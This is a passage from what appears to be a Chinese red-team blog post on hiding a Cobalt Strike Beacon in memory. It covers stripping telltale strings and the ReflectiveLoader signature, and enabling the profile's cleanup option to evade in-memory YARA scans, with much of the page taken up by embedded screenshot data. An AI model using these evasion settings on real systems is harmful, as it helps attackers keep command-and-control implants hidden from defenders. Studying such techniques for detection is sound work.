AIDKl0cvbkK3P76k27GVKMOT6vzvlk+L+vQiIlp+/9DmKzvm7P0d3xtiO/i55mi99EMfQvG1dc2h39ykf5nemJsJvaywcSo4cPnp1Bbva6c/N6d3km/YsT/kGMXz6pAVnlQvV5ttZ5MV97KB1j9/am7m7f2kqEu2aw59N73toRc3d51Ev54AAABQ6VbWNr587fOdBw8TXc3ys/ffpa394mFXr9Ibc/b1RLR+686df6bTXfpLP8TLhNfa7ZNfPM13yKTU8t//7GU+FI/cWqZt64MDl5/uT+3MiYho2/b2zV/8/QpLCVUAbeNVZ/l0V+ulH/rmnl9PFPI49HubLonSYQAAAAAqzYqi8eWrtEPqUumZ1+18sjCRdF7otoPPJz7++XNn7yXb2dAorrrW3GOH87j2XZ+W5H+NUh+F4G21n0I6KGQn+b5xqFS3T3bsv7RT8Fdgqz10/nuH9u7XO+k5z0w/ThoAAABQifKMxr+4GYrcdLy78aCoxXurne1354vRptazRKK8cdbtW0tE2/mvwYHNvR9
</p>
<p>从微软的文档来看，我并不能明白这么做有什么好处，感觉很鸡肋，比较了解的师傅们回答我一下</p>
<p><img loading=lazy src="data:image/png;base64,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
</p>
<h4 id=0x0313-清理反射加载器>
 0x0313 清理反射加载器
 <a class=heading-link href=#0x0313-%e6%b8%85%e7%90%86%e5%8f%8d%e5%b0%84%e5%8a%a0%e8%bd%bd%e5%99%a8>
 <i class="fa-solid fa-link" aria-hidden=true title="Link to heading"></i>
 <span class=sr-only>Link to heading</span>
 </a>
</h4>
<p>当Beacon被反射加载到内存中时，它会导致两个内存分配：原始Beacon DLL（实际上将执行shellcode存根和反射加载器函数）和虚拟Beacon DLL（正确加载到内存中并准备就绪）</p>
<p>在内存中的情况如下，RWX存储器区域对应于虚拟信标DLL，而RX区域则对应于原始信标DLL</p>
<p><img loading=lazy src=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABkUAAALWCAIAAAB3NwP5AAAgAElEQVR4nOzde1AUd74//M8A2T2RGXN+v1VglKvO4G2AMWqEAbzFjYGse+AcjH+gsXarHMoqq4SnimJrQ5XrU+7WUvwB1uPzWJCqTRnDH0Z+R8+6Ad01EQUGTGIyyHhjRuWmoGbrbJyBZE/Uef7onpnume6eO3Ph/apUSvo23+7+zre7P/P5fltmt9sJAAAAAAAAAAAgih05cqSnp+d46x+JKOnm0LVIlwcAAAAAAAAAAMC7znMXiCgp0sUAAAAAAAAAAADwyeHDhwnxLAAAAAAAAAAAiBVMR0M2nsUka0UhmUwWTxsJ1XbibCOh2k6cbSRU24mzjYRqO3G2kVBtJ842EqrtxNlGQrWdONtIqLYTZxsJ1XbibCOh2k6cbSRU24mzjYRqO3G2kVBtJ842EqrtxNlGQrUdbCTWLfrXf/GcmDD35QAAAAAAAAAAAAgY+hsCAAAAAAAAAMSSzZs3h2Q7W7duvXz5cqg29bvf/Y5CWjZmg4J48azEpJ++sAfxUXb7i+c/JMhk8zD5DQAAAAAAAABgzjDDSAXDOfZUCDcVpg164sWzUtLSNhaV2u0v7ERMRMrzH0TE/eeFy1+uL8j95//8eOP2/Q15OZcu/iUpIeGVV14JstwAEHqpK3fkzPYPjtv4k9PyigtS/j702Z1p3uQFqsK18gf9xsdzWEIAAAAAAAAAH/DzsxISU3+mkJF0jpYr+8pO9Ot3t9vtdiLakLd8curx8+fPE5LQhzF0luRXvJ7y6OtLXzyKdEmEJa8s3aiWP73ebYrSAvoobc07BYumhq58Pe192fBYkKtbtzz5W+Pfbk8FugV10evLk70u9rPivNmLw99yJ9lmvyf6WUFhps0j1JWqKd6RctdteQAAAAAAAIDI4sWekpISX/tf/zvgbcmtM0TEhLc4FGveLF5lG+q8Fuhz+ry1JL/i9RSaNkVrMIuIZu703pSXrVlXmmPtfWCNdGkClLbmnYJF9PhW5IJZRDQ7YriT/POVWl2WzTAW0JGctc0QJdP0cJ9bRpUzAp2WV1yQQo+fCAenbE+/tRExaVnLk7+/d+0OERF9f+8BglkAAAAAAAAQXXjxLJlMliCjAcONib//SDK7jIhkJJPZSUYks7/2k8TNRauI7A8fPiJHD8SsrEzTg7//X//f5f/zf1cIbD59bdX6VCIim8DMeLakoHJdivMvq3nw0h23GIVi1ZaNK+RkNV/77K5g+CLtjddTyDb6+VfTRLR0/fYNaUREnFyttA3vrFlCRESPvvnsS+vybZuyFZ6bmb75X9el4jSK3MKtqgWe0x998/lXU0TKvF+uXSyw2uObf77ORE2efGVM2anN3vL6zPmvn0h8ULRa/HrBIpoZu2p86pykUK0vXeY6Jrb7169aZlxryLM36TLlrr+//eavt3jB2rTVZfmLXKs/uN5rmXX8xeRhCc56+s3worK8zJL82e4brsL4Ky2v5O28gNcmogXyZCJ6dXnOonvBbAYAAAAAAACAiIg02kIiMhkHA17Ak0DfwISEf/nbnXFZgj0h8aUsyfH/pJc6Zfp3z6wLFQsSuT0KpYd+n/ymkxwhrXkjfcPPN6QR2R58dtlCK3VvqpMV6mXpd4YmOcssXKFZIRfdAhEtXa9ZQvRoxPKMiIgefnVt4ZaNK+S0ZEkaPZomIlqy2BXMekQLV6QoiMg2evnKvWdEC1cUbVUtINvoZclgFhFZRwb/bM375drFZBu9fPW+lYgodX35miVrt21TXPt8ZPjPxJ+rWLatNFuemrKUHj9kNjFluq7cui51zXrlk69iLQlviXa1kmjKMuqMKbLBrMe3u4aeEi1+/a1VacvWbSJHSCttdXn+IpoZ7+0ftRIpCzatTV20tjjb1s9uQVmwaW0q0cx4n2GMVOtLcl6V52QpLUwvQkcw6/Gd7hszubp1y3PWlRInpDV925hSqk1duTbt6TeBJouJ5melrtyh+dljk+h4WPLstcX0Tb9tUSp9f+/a1xbbAlVhhmPmooJtK+imYQhjaQEAAAAAAMQ1JrTkC7/CT8yWBVfx/RO5ePEsZ1fBf134iizBnpBElPgiMdEuS7LLEl++kpRARP/yk58sXaIkR35WYkICEf30tX/KEoJ5M2IcWahamcZJyLpjOHvHYxmFaoOarDZSiIW0FKqVaUS20TuePQ3l8oVEVqKlyhTu1KVpC5zBLKK0FaoFRPTIzPzpr8dffZPyy7WL5WmpipH77slj1vuff5P8y7WLlUp66IhePZp6ui51sVKZQlMxlaIlz1anEs2MmT2DR/JkBT210tOvbywuz18kT12ssMxYiZSpi4jI9vgpc1imhm4r31qVlrxIKR+12tgN2u5f7703S0Rk+arbwtlmWtbyZCL61njjKRGN3P92ed4iTrSLiGjqybfa1EVpKYtpOvAULZJnlRRmCFauVE2xlrghrQWqvEU2RzxNnr1S+4SIXl2+sXg5O43z7zW6AkJICwAAAAAAAPxjMg4yQSvPkJYzmOVvdIwXz3r50v7ipZ2IFipeeW5//j8vf5x9/sPzF//z4z//SYkvf5D/byL64Yd/Ppx2PdFmZ2Um/ssLxVIr4lmM9BU5Cpq5+0hqBKSlK7LJfO2OYuMGkXjWwiWLFURkswlEo+QLFERWki/krWu7feWz287VV+QsISLb6N3QD7yVvHLTxtyZm3/uGuZNnnoypV2sTM1ZqXji3rEyiimUi+VEZJvhFtlq+arL4rEofxn5siylheljyI5axVAuz5TTrGV6hvc6UAdlyiIiosffstGr6W+n8xal0aK0NJpyBtSYialZufKnI4H10k1d9XbKz2hmom9gzEaLtNtXps1MeL7T0LEni1JTFtAoEZFt9Jv+e6QqXJtKzLsOnQNpfW2xkUwmS9PoliUvIJoV3BIAAAAAAADEB19CS/4mVQmGtAIOZpF7fhYR2e1ENPv8h8n//vvsix/sCc8TX3mZkPQi4eXL5/YfiUgmo6SkRCIZm6ElkyX95Pm/pv49IeGl1OfIVTsqChyjO83cvtx78zvnPMWaN4tXOUd+st7/22cj3zlnbSteyRsU6vG1/zJyOu4pC/8tf6nzr6kb/+cLToe319RvbVnmWtv24LPPzd8R0dKCf1+XSjRz5/qTpetynAs8vP7Xaw+ldoKINzCW1fzgmTrH8elPvjw/NEmKhXIimqElusrNrlfNPbz+N9eY7kvyN6Q9+fIrK60X/RCFIpmIHj1yyxqasdqSFfKUpUvokS1VKZ+12hYIZHgplq9XLSCaHfk6sOQsIsWybWsXE5Ft+rF7bEqRukRONOO5zozNRiRfIJcT+RfPSl5Z+obauRczY1eYceWVa35RwI7bZbs3Zl2epWSXePr1hZuOY5m8onSDOtm17tW+Ub8+XJG8gIimJDKh5Nmb8hcRffvNELvM1NBVXpdK+eK0ZKKZb6dsRJSskBPRLKWtL+MMvzU93PvNNBEtTmOGkpt1Hr6ZmRmiZJLLuUEiZuKryXJ/R51jxr0ienx7iEoKUjJKtjt6CyZnFL/p7DnIxqeYVVSaDPnMxD1ylFa+KDWZbKPjgp0dp02GSI6YDwAAAAAAALHMLaQVTDCLBMfPIqK7jx/ZE18kJL1ITHqZ8MrLxMQXssSXTAbWT3/60yVKpfONaYkJCUmv/Phq8oxQPgqHIlnBBKpey92xddmqraXEhrSURRUFS50RrvS1VeuX/fxNYkJaGRuLVyrIOmL4620rEVG69j/WpW58QznJBq3YYNbD6xcHJxVrtulWKvML06cGmXCXI5j18PrFaw9lr60sfjM3581t9Nnn5u8eDv0nFfz7utSV63LYINfSgn9fl7p0hfq1h+bvRPeBiIgeDZ19lPbGzryltgdf3LE8e0TbN+copofPfsk86SfL5USUskLt6HK4pKByXcrSdbrVNsOtZ8SM8v7o60sPiZaKfoZioUjeltU2o5AnKxQKki1Q2GyPaIHnAPBLc7MVRDT94LYjtMOOpSW4N8yg
</p>
<p>同时原始信标DLL中也存在可疑字符串。这些都可以通过内存中的YARA扫描找到</p>
<p>前面的是原始beacon，后面的是配置strrep “beacon.x64.dll” “";去除字符串后的内存，还应该把ReflectiveLoader这个非常明显的特征给去除掉</p>
<p><img loading=lazy src=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABjMAAAI4CAIAAACgLozUAAAgAElEQVR4nOydd1zT1/rHP0FbIQkgI0ASRghhgygoUxFQcVbrqHaprR12udra2t7e272X1u7e21Y7HdVqnagMJ6ggypC9CYQpK2B/1fz++GYnQFii7fN+9VXJec78juT7/ZznOYeVnZnqHxQGgiAIghgCci6mDXcXCIIgCIIgCIK46Xhq7YakpCQAI5nP9OZAEARBDBE0/0EQBEEQBEEQhDavvvqq+u+Rw9gPgiAI4h8CzX8QBEEQBEEQBGEUs+HuAEEQBEEQBEEQBEEQBPEPRd9naufvh4alHwwsFmvQcw5RtcPegSGqdtg7METVDnsHhqha6sAQVTvsHRiiaoelA+MCPU1vlCAIgiAIgiCIfxoUzUcQBEHcOEIXbR3qJlgsACyDFK1ElraZZZBitAqtaozWpPNvLw2ouqPbLa1/9PprrENg6Xd64ANnqdJ6rtRoNTA4BPpN6o0G/Ry4sUNhoI32eihYekPSTzFaqekDN0zGAA+F4bkxfl3pDtywIsOLWP9Q6F9WAzwURvtucIZ67V2Pl6nh+evjoTBahwnXlbGudHM1dFfA9EPR+zXQ7eXDMvqn1ie9DumP2/RDYdjd7vuul2L8LBqtWOd/mn+NXD4wdijQ7cANU3o7FIYXqH4vDL6ne7/FjN/bPd5nfT0Uhv3VOzf6nTbhFuv1Iu71UJh2DfR0ixk5H4Yd7TZrPw9Fb9eAkbun11us1ztm4IeiLwPv43Vl/EqDKYfC2BHvx8BNuK4G8kRneI51jejzwPs0c/z3YMzteYaJFM1HEARBEARBEARBEARBDA/GfaZG3m5+7fqA6v3raoeZmdk/UP8jCIIgCIIgCIIgCIIwkXsmWA9KPbGxsUlJSYNV1aPv/Y5B7RtToVGMK1MjRoy4Y/4iQGF6M19s/ePxZXeo//jx2y/Mzc1HjBjR1+4Sgwbff04QMg7lSPUNHO+J451k51MKO7RTBWMnj0PugYsNN66HBEH8U5kUbBs5hjuQGt79rgwslp7LNkEQBEEQBEHcigx8J2v1ouGDWNUQVWiIcWXq2jX4ivkKRc/KFEuhJV1tevlR5o9PXln5F0Z0dXWNHDmSlKlBgx9wx1heTWbS+RrmM8dnUqinCa91wTP8cSinRieNzeGAKx4/m5O7P7NelchzcgTgNyvo8oGL9bp1cLyiQiSchgsJubr13Go4eE/zt5XlnLlUN1w9YIvHB4jYzdnHCwenCzxJjI9Nfd75HJITiX4ySuAt4pu3lVyUNt/YhicHW82ed9dA5j/e+d/rLLNRhrH7BEEQBEEQBEHcWnS3ArriL4wY7KloS/8pUb7tF3em3dr6xjDAD7hjLA+ynPP6R05eePJsfrs6m/+cIB5Qr+Un5RAyQ2TJRY22dxSXYwmgo/x4ppYC5eTAByAz6jPVUXDqMjfed1yUqP1UWdtgDeoG4+A9zd8W9QXDJ0sBkJecL+ZEewSMd047X9XRe/4e4UlifWzQWEKy1N8Fc6GfWNhVfbak5QY2elWaX2MexBd72+fmN3TeyIb/HOj8B65fVbBGsli0WuIgMfP+ypf9jr76rweHc4feHnB8bsvKh13yNsTt2D3cXRkQsfMurPM8/vEHawfH0b4f2D+x8d6lgqJXFx8cnFMdNePEk+KTn3/+4qlBqY74B2J11+qYO3g1X/7n/Jnh7gpBEAQxXPS0N9/JlHNmIziG6devd8TFjAdwIfOiOnFMYACAKU9vO/bRkmssg2qdxy0a7wgA7fqWvzmCwHnjHNSf2ovSEgv0FAmOT3SYF9eoicFh/Fge2suSM3rWVDjeEh46ylNOlGqJR3Xph+qguyOAJZ/HBdDe0aZT1h6QFxXVdxMaU59xiTdrjOukoA4Dj6pbAvsx/raQV53JblQnccVjI9ws1B/byy+eKZFrFWGLQ8eI2WrrpdRSbasqz4Qx7mx0lGellumWnRDoriqra23MyrON8xGE+XUm5jai/9gF+Nigs+bc5SatRAv3EH/1mDoqc86V91VqsBAF+7lZoKMqN72iS8diL472Gq3+pJvB3G2sr6uqXXnV5fRK7bK61uq8DD1rkI9L91bXIG8Xc7U1/0KVbq+GCnOXAE+hut2awkvVV/tYwyhnf4nQHJ01RZekJpS1dQ4VWQFAT+MzF/q6C1S96pSVZkt1jpXAR6RlLcup6cmaW6vuVWtJOTfEzc5P9Gd6WWvvXR00hmL+Q/h2wourS7/jPnZ+cOv9+zPz/sqX/XB8280qSwGQvbd8lzhxwTtbYguWJ+UMd2/6Sey8C+s8kbZv+GQpAA2frz0s2j795Y3hJWtTCwZYWdSME0+KcT7hhVMUWPv3wOqeZ+PvrE+7e2vVDWy0dccn6YLXQx5b5VO9Oa/iBjZMEARB3Dz0pEyZjeD8dK6MNeK62QgFa4TC7LZrzB8L3H3r6xtsbaz60E7VhZ1QiVP/GIQhU8Y7Ae1lScdL4BUeK2FzJWJhQVa1Vh5Lr0CvHoPyBMH+fKCmqLQ7ZyXBuJhgzXF1mzzDTcuo61TFtMhhA6iprYeT/+wg+5qLKRkQSThoL8nNbweL7zdrjD0gLzp9vkC7YG3uBcfocY6+wU71GbUmDf/mwSnAyxGQlVaqB6SUpeoLjmQ3AnZjYr0c3YIioBanVLJUfeHRnE5x6Bix25hw6ItTXHdPtfykhUqWaig6ltMpnhDo7hYYDi1xqq4w2z40wN4j0KExq78OXA6+Yh5QX17VoXkXUMlSjSXJlzvdQ/zdXPwnoG/iFMdVrCXWaeB5B/vaAZ216RekcPUPcR7FcRbwKkrqAY3w1FR2Ir/Tbayvq7NvCNTilI5VNNbXRegTDLX8pJKlmspOFnS5BfnoWZWyVFP5qcIu1yBvF6H3ONwAccrcJdBTaA40V6YWd7kEeAr5nmPQN3HKQuCiFrZMoqnqLFTiVDe9UspSLdXnSv4U+roLHN0DoBanVMJTi/R86Z8CH5HAUeQPtTilsaaX/SnwFvEdRX7QEqeuSEtGe4ut+eLRrSVX+tLtATOY8x8LHu14NwgASoesuzcnc5bVvOKv/lSyddPEzTrutQrw/7NzzWOuKNm6adJnxr6+FUHfveyHiuTZ6y/BDIvfe/PDSQBw9NV/rVAKVWO+Pb14CgDg2GsvPVQyLen7ye6G9Zzc4b4hq4eeBjy2as+99obpiW+98mgCWPGLC1/0NVLs1C6vf2cDALIfe9uv4IWJu16v9/5Pdg8N3az4bFznierUe97U7JTss+zBnxfaqj+W/7ZlwQ9afrCiqF0bw1w1n4teWfDHfu0qJ885u0ai/lSx64e7flbPedg9ten+pUKVaffPi39W15z/3CceZ1ZP2LK+KeL9gWhTkrefFEOavuLjIq1E28c+WHIvX9Xu3m1Lt/c1Vtj2kXcW3cNH5b6dy3fqlo2YeuxRzaVXuf+3B39TZ7B5+M0FS5zUpl0P7dYua7Pijfka64E9D+/WntexffC1eWpr1cE9j/yuU/aBV+YuVlsP7V2558Z8UVrf/+KshaoHvOojB1bt7+vkweh7n4+f7wDpsYQ1B03wxh0Xse0eIQD0NAVpdffTU+epplylSceeTdDuldWSdVPm8pQfapIT1x/RtlretSZOY01Jfu6o2lq9aYdg612er9/dtvxX7cdkgiAI4mYkYGw4gOzM1H5nMMR4HMS168qd+Sw5Iy25Iy25t3E5Iy05t3E5t3HZtzEmFhAY6D8mMCAwwJ95YQDA4Q80ROnvg6WHtxPaitL2pBS3AW0FqXsPJO49oCNLwVI8QYL2HvzILN29HYH2svzeIiBrLibvO6T9X24NgI56qaZyXvD0ybOnTx7nCAD8oMmzg+wB8CX+wRJ7oKGQWRC9NvfA6Yp2sCWR0cFOuk3IGgA4OfJwa8FxFTsA8qoSQxmIw+YCQOOlnCYAXJ6dUiR0cBazATRl5TQC8pKyJgBcN2cdYZXjEuCGDkM/KgdndzaA5mymbHkzAI5u2bqGZgA8e7t+jojtLLIHOmtKtZ8d7YVu
</p>
<p>扯远了，回到正题，针对这种情况，CobaltStrike提供了可以在profile中配置Stage.cleanup选项为true，对原始Beacon DLL进行清除，</p>
<p>仅保留虚拟Beacon DLL，一旦启动Beacon，就不再需要原始Beacon DLL了</p>
<pre tabindex=0><code>set cleanup "true";
</code></pre><p>清理前后的内存对比</p>
<p><img loading=lazy src=data:image/png;base64,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